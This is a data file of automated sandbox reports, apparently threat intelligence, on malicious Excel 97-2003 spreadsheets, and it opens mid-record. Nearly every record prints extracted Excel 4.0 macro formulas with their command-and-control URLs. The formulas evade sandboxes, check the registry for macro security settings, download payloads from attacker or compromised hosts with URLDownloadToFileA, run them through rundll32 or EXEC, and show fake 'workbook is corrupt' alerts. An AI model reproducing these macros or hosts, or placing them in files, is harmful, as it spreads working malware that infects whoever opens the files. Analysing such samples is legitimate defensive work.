,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nlrIIU4ypX\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"675b6b9ef91a83bc03fb4dd3379148da286ce34b0e3360d61b700207297edd15"},"analysis":{"reported":"2020-04-09T16:16:46Z","score":10},"files":[{"filename":"675b6b9ef91a83bc03fb4dd3379148da286ce34b0e3360d61b700207297edd15","filesize":212992,"md5":"ca3974fe3812285802f9a33b15ac3dbd","sha1":"b11d3012cc9427469e3129da9ce47a8ad4e95e34","sha256":"675b6b9ef91a83bc03fb4dd3379148da286ce34b0e3360d61b700207297edd15","sha512":"a498e90f1d6f3668448a9130e95abf8e5976fbfc8473d7606945be418d9b831c9dd4dbd9bf0725f63b0f330515607c8503964d21f0c58f4540884683f9cc8965","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"675b6b9ef91a83bc03fb4dd3379148da286ce34b0e3360d61b700207297edd15.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"chrlPt15AA\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"678095e58e3f678e0a4f9fc5c788afd2b4057e7e63adc9f0693c1945e2dbb0ae"},"analysis":{"reported":"2020-04-09T16:16:46Z","score":10},"files":[{"filename":"678095e58e3f678e0a4f9fc5c788afd2b4057e7e63adc9f0693c1945e2dbb0ae","filesize":214016,"md5":"fab7aed2d09c12e3c7e705a4966bffec","sha1":"300c0bbb652ea8963b33dadf9576009c6d7b7881","sha256":"678095e58e3f678e0a4f9fc5c788afd2b4057e7e63adc9f0693c1945e2dbb0ae","sha512":"dad2cf66a3677268e7f859a01597c483d2a70dd2e42500545ea20c87e75d0fecd0c5b37e746fcd7943641afa672550b8a85d5e2121f6c4c77fdf1b869698fe2a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"678095e58e3f678e0a4f9fc5c788afd2b4057e7e63adc9f0693c1945e2dbb0ae.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NBobO9bzqJ\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6783fb45811b420d8565db97322fc8e8cc098f55d2da68152faa517b4e2da713"},"analysis":{"reported":"2020-04-09T16:16:46Z","score":10},"files":[{"filename":"6783fb45811b420d8565db97322fc8e8cc098f55d2da68152faa517b4e2da713","filesize":116224,"md5":"33f2e73383166007a68b7b819a9d0326","sha1":"9d7475b6485f4cdaa8b416ae11cccdd14301a992","sha256":"6783fb45811b420d8565db97322fc8e8cc098f55d2da68152faa517b4e2da713","sha512":"5cc8605c756952f505b42a9636d27bc98fc2281382f4f87bcca64b1ef230c2effce2db3cd0a3daeb30d1d2d753e069f0bf9b5788e4db11f87dc62d4e0146dab2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6783fb45811b420d8565db97322fc8e8cc098f55d2da68152faa517b4e2da713.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7bnUOocgYB\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6784999b20f4393c06efcb0d7a86f9a7bbb0d9440377fa4f0ae9ab4783b386e4"},"analysis":{"reported":"2020-04-09T16:16:46Z","score":10},"files":[{"filename":"6784999b20f4393c06efcb0d7a86f9a7bbb0d9440377fa4f0ae9ab4783b386e4","filesize":104448,"md5":"1562d3ce5918431ed03c520ef8454038","sha1":"849382cfb9fb15d0e18ad222bee4a50571a5436b","sha256":"6784999b20f4393c06efcb0d7a86f9a7bbb0d9440377fa4f0ae9ab4783b386e4","sha512":"f860fe46493a6f1f3af96b44c2f053f5a5c1aff9ec1bb3f6b3cc2d6373c800da9e364eab0da357b4703b1611e47a380b6f0e4a136157a16c29e6df96fef6d82f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6784999b20f4393c06efcb0d7a86f9a7bbb0d9440377fa4f0ae9ab4783b386e4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"3929THw5hs\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"67a46a7954361ad55be59ce6102d57659c4ca53790005f124953a836801ae86d"},"analysis":{"reported":"2020-04-09T16:16:46Z","score":10},"files":[{"filename":"67a46a7954361ad55be59ce6102d57659c4ca53790005f124953a836801ae86d","filesize":101376,"md5":"ef3b386b203aa20437cca266bb642511","sha1":"db4bce6e4063af7bab0149fd4706b9c9053b0290","sha256":"67a46a7954361ad55be59ce6102d57659c4ca53790005f124953a836801ae86d","sha512":"31d69f5260763d7995a4366fd465fd9c9776620a5b1c24468dabe8357c302662a9a5e3000da5c2891ce11214396953c247861c0fb84b5adb350bf47313e326a4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"67a46a7954361ad55be59ce6102d57659c4ca53790005f124953a836801ae86d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://nonnewspaper.com/bot.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\aWLfVMa\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\aWLfVMa\\kTTGsUq\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://nonnewspaper.com/bot.dl\",\"C:\\aWLfVMa\\kTTGsUq\\DRyQCGg.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\aWLfVMa\\kTTGsUq\\DRyQCGg.dll,DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"67cf7a3422463fabb335773a1b923bd3e8bd32657d2b8ac102acbf8da5d8b5c2"},"analysis":{"reported":"2020-04-09T16:16:47Z","score":10},"files":[{"filename":"67cf7a3422463fabb335773a1b923bd3e8bd32657d2b8ac102acbf8da5d8b5c2","filesize":209408,"md5":"f9e1f64216c1475b0bbb6dd37bae243f","sha1":"d81c32a3e568fcce2a06acc55492c49431e16679","sha256":"67cf7a3422463fabb335773a1b923bd3e8bd32657d2b8ac102acbf8da5d8b5c2","sha512":"25ad623c3a856dcad196d8f56db4f0d26233d040f1b37273e0673061f629eaa9204081361a7b1e0b3ec678a8e30938bb48b791b7ab3ec33403758756ee90d51e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"67cf7a3422463fabb335773a1b923bd3e8bd32657d2b8ac102acbf8da5d8b5c2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FkVnSENEZY\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"67d405dd2d9314a1e67190e41635199adadc7f6625a07eaa6f9fad6394154305"},"analysis":{"reported":"2020-04-09T16:16:47Z","score":10},"files":[{"filename":"67d405dd2d9314a1e67190e41635199adadc7f6625a07eaa6f9fad6394154305","filesize":167936,"md5":"89d9ddfde42463505b4368dd1c83f36a","sha1":"d4c63e1e16cb8326c1da8cfc84d0077661a12c9a","sha256":"67d405dd2d9314a1e67190e41635199adadc7f6625a07eaa6f9fad6394154305","sha512":"1c663f8ce8825287f9def9e2b3bd7deb3aefa2d7311c31e2d2490073b82a8ab0c335717b4065a5e27bcf16bff25ec674d99022994de7bb78ab774eb054302f1c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"67d405dd2d9314a1e67190e41635199adadc7f6625a07eaa6f9fad6394154305.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8wqFXVyBhL\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"67ef50a5583e8c3f0021c93a00913bee5f21c3883650afcf210f1fffebe58934"},"analysis":{"reported":"2020-04-09T16:16:47Z","score":10},"files":[{"filename":"67ef50a5583e8c3f0021c93a00913bee5f21c3883650afcf210f1fffebe58934","filesize":397312,"md5":"d63e7291763e49eaf9fec2cf5fdc0ca2","sha1":"8c3bc6a9c4d35403b614cbcb2ef1a35860e9bb4e","sha256":"67ef50a5583e8c3f0021c93a00913bee5f21c3883650afcf210f1fffebe58934","sha512":"056d620b11a218c250de74bf54428ddc6620adb76f7241456752e0a4eb9858394761f3b70c26111f9acdd825b2bf98459e19940ddd7b3744876e913b9322a97b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"67ef50a5583e8c3f0021c93a00913bee5f21c3883650afcf210f1fffebe58934.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RIGHT(\"5/5/5\",FIND(\"/\",LEFT(\"5/5/5\",3))-1)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"67fdea200f73516f0e003a6d00d80c5f3caca11cf32f28dfbe6cbc645db2c670"},"analysis":{"reported":"2020-04-09T16:16:47Z","score":10},"files":[{"filename":"67fdea200f73516f0e003a6d00d80c5f3caca11cf32f28dfbe6cbc645db2c670","filesize":185344,"md5":"888da08be101e236b99d92dde564a9b4","sha1":"f7c948abac3d9e9e8985fbf164b7d5da1118551b","sha256":"67fdea200f73516f0e003a6d00d80c5f3caca11cf32f28dfbe6cbc645db2c670","sha512":"50b58d800ade5ae21357516eab3bcd9442d465e16e5a95cdb4dca4242cbd236ea5bcd83a8cd8e0d54be3aa0400ebc62480633b9f17fe49d66806033adc050c39","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"67fdea200f73516f0e003a6d00d80c5f3caca11cf32f28dfbe6cbc645db2c670.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6803e211714de79de3c3a150c03578ce7faf366f53c03c2d52250e4f163160d7"},"analysis":{"reported":"2020-04-09T16:16:47Z","score":10},"files":[{"filename":"6803e211714de79de3c3a150c03578ce7faf366f53c03c2d52250e4f163160d7","filesize":132608,"md5":"62e14aff604d61ce98fa2d9c6de008da","sha1":"a4bc10602e9bcdaa674dfdc695801fe1e317eb5c","sha256":"6803e211714de79de3c3a150c03578ce7faf366f53c03c2d52250e4f163160d7","sha512":"4cbf4c1b16bc8a405d0d9137bcee75cdea6b10734105b3673f979d640c85fac96b7ffb1acc7acff637d842661d6cda358d1cb31c710c3be3b109a76cf8d24496","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6803e211714de79de3c3a150c03578ce7faf366f53c03c2d52250e4f163160d7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ybRrooJyoz\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6812a46e428bf7737319a5157972a2856d4e4caa4a3191e5ef19bd9e9dcef036"},"analysis":{"reported":"2020-04-09T16:16:47Z","score":10},"files":[{"filename":"6812a46e428bf7737319a5157972a2856d4e4caa4a3191e5ef19bd9e9dcef036","filesize":113664,"md5":"b26fab22c79a0d3bfb04321c89f6df3a","sha1":"44c78456fda91def18bfc9d4e0572543ca3fa259","sha256":"6812a46e428bf7737319a5157972a2856d4e4caa4a3191e5ef19bd9e9dcef036","sha512":"4da0a899a22145d12c8928b45dca54fe99d0d2de95a0f63c29dad55c209d0c58377853004ca7334be8e508792f1ff8d7f53b6f55b37acc3934ce0177bcf7ad38","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6812a46e428bf7737319a5157972a2856d4e4caa4a3191e5ef19bd9e9dcef036.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"G7NbTfMCfC\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"68229d322227f132be278212cfc84062bb24b7eb2660d183290ca9183323b627"},"analysis":{"reported":"2020-04-09T16:16:48Z","score":10},"files":[{"filename":"68229d322227f132be278212cfc84062bb24b7eb2660d183290ca9183323b627","filesize":206336,"md5":"12e00f44675449f70acc8bdafe46a6b5","sha1":"c76722a5a61f799a692ca9dfbb686b72ab99c90b","sha256":"68229d322227f132be278212cfc84062bb24b7eb2660d183290ca9183323b627","sha512":"2b019afcfc664d25c158a747e7e0cf7a17db3d9752a4f7945f12c910c37db23710c349c17564f6f95397eaac975a0f51acbccd4cc47dc0f16889d02c312d6f48","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"68229d322227f132be278212cfc84062bb24b7eb2660d183290ca9183323b627.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ngm1gZGR1b\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6826d4a4cda0d87917c1995fe9f91770a4c56d4085f2bdeb2efc9801da2d6a84"},"analysis":{"reported":"2020-04-09T16:16:48Z","score":10},"files":[{"filename":"6826d4a4cda0d87917c1995fe9f91770a4c56d4085f2bdeb2efc9801da2d6a84","filesize":185344,"md5":"58746fc377ac398b3e58bb62714be72f","sha1":"71cf35c0330e61934d3cf2112c9964e3202af9a0","sha256":"6826d4a4cda0d87917c1995fe9f91770a4c56d4085f2bdeb2efc9801da2d6a84","sha512":"aef5dcdaa092367596caa80a39372ede17a99e745e817da8649237e1b897417c18424c9f6dc9eb27ab8978de4fc170dde8914f5de2430059c0a447e0974b883c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6826d4a4cda0d87917c1995fe9f91770a4c56d4085f2bdeb2efc9801da2d6a84.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6827040126c71742a4b19b78244f582166fc9e5e5bf784648ef38d07b6417c70"},"analysis":{"reported":"2020-04-09T16:16:48Z","score":10},"files":[{"filename":"6827040126c71742a4b19b78244f582166fc9e5e5bf784648ef38d07b6417c70","filesize":221184,"md5":"6dfc5ee7591ab8a5a550929fe8cc8f10","sha1":"818e661f15be011340d36a94508b59e5e0bc9ad4","sha256":"6827040126c71742a4b19b78244f582166fc9e5e5bf784648ef38d07b6417c70","sha512":"4d64545506f323f65ddfecb7f3a2240d2af2e0da51d4fcfd720aa2d0ce91da5d23954d00182bb1f3d06ac7ebbf6c51fecf823c117d0f4f06355930a81c6d8c53","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6827040126c71742a4b19b78244f582166fc9e5e5bf784648ef38d07b6417c70.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"97NUSVfykR\",TRUE)\nGOTO(R$3C$16)"}}}]}
